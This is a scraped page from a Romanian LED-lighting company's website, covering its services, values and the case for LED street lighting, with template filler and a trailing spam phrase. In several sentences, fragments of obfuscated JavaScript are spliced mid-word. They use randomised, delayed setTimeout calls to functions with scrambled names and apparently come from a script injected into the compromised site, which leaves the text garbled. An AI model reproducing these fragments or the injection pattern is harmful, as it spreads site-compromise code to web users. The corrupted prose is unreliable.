Lorem ipsum dolor sit amet, consectetuer vitae adipiscing elit. Aenean commodo ligula eget ut, dolor. Aenean massa. Cum sociis pretium qui asem. Nulla consequat massa quis.

Popular Post

Sign up for newsletter
[contact-form-7 id="3" html_class="cf7_custom_style_2"]

DESPRE NOI

home_slide1
finala-romanii-au-talent-2016-4
behind-the-scene-vocea-romaniei2_cr
home_slide2
iluminat-led-reclama-12
iluminat-led-embassy-old-town-17
iluminat-led-crizantema-de-aur-31
iluminat-led-fiord-club-4

SHOWMINE – Solutii profesionale de iluminat cu LED

–       Iluminat stradal

–       Iluminat parcuri

–       Iluminat solar

–       Iluminat arhitectural

–       Iluminat studiouri de televiziune

–       Semnalistica rutiera

Scurta prezentare a companiei

Cine suntem noi

Grupul de afaceri Showmine format din Showmine Tech SRL si Showmine Led Install SRL activeaza pe piata iluminatului cu LED din 2011, avandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and ca strategie promovarea și dezvoltarea sistemelor de iluminat bazate pe tehnologia LED (Light Emitting Diode) și a sistemelor de iluminat cu panouri fotovoltaice.

SHOWMINE nu este doar un nume de firma, este un concept de abordare in relatia directa client si furnizor, mai mult decat o colaborare, un parteneriat intre noi si dumneavoastra pe termen lung. Preturile pe care noi le oferim clientilor nostri, sunt personalizate in functie de fiecare proiect.

Valorile noastre sunt:
  • Creativitate si inovatie
  • Devotament si initiativa
  • Rationament si disciplina
  • Ambitie si motivatie
  • Profesionalism si integritate

DESCHIDERE SI PROFESIONALISM

Dincolo de profesionalismul necesar pentru a reuși într-un mediu dinamic și cu exigențe din ce în ce mai mari și pe piața românească , echipa noastră se dovedește o echipă tânără, deschisă către client și către soluționarea cât mai adecvată a necesităților de iluminare cât mai bună a obiectivelor acestuia.

Suntem permanent interesati de imbunatatirea produselor fiind prezenti la majoritatea targurilor sau expozitiilor de profil din tara si strainatate.

DE CE LED?

Desi toata lumea s-a convins de beneficiile tehnologiei de iluminat cu  LED o sa facem o scurta trecere in revista argumentelor pro acesteia.

Consumul unui corp de iluminat stradal LED este aproximativ jumatate din consumul unui corp de iluminat stradal clasic.

Cheltuielile practic zero cu mentenanta deoarece sursele clasice au o durata de viata mult mai mica.

In aproximativ 2-3 ani cheltuiala cu achizitionarea corpurilor de iluminat stradal cu LED-uri se amortizeaza doar din economiile obtinute prin reducerea consumului energetic si datorita faptului ca mentenanta in cazul iluminatului cu LEDuri este zero timp de cel putin 5 ani.

Random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andamentul optic al corpurilor de iluminat stradal cu LED-uri este superior celor cu reflector clasic.

Gama de tensiuni la care se alimenteaza sursele de alimentare a corpurilor de iluminat cu LED-uri este mult mai larga, incepandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and de la 90V pana la 250V.

LED-urile sunt mult mai rezistente la vibratii si solicitari mecanice.

LED-urile sunt ecologice fara componente periculoase pentru mediu.

Conform opiniei specialistilor sistemul de iluminat bazat pe tehnologia SSL (Lighting Solid State) cu LED-uri va înlocui tot ceea ce a fost folosit pentru iluminat la nivel global, până în 2020.

yoast seo premium free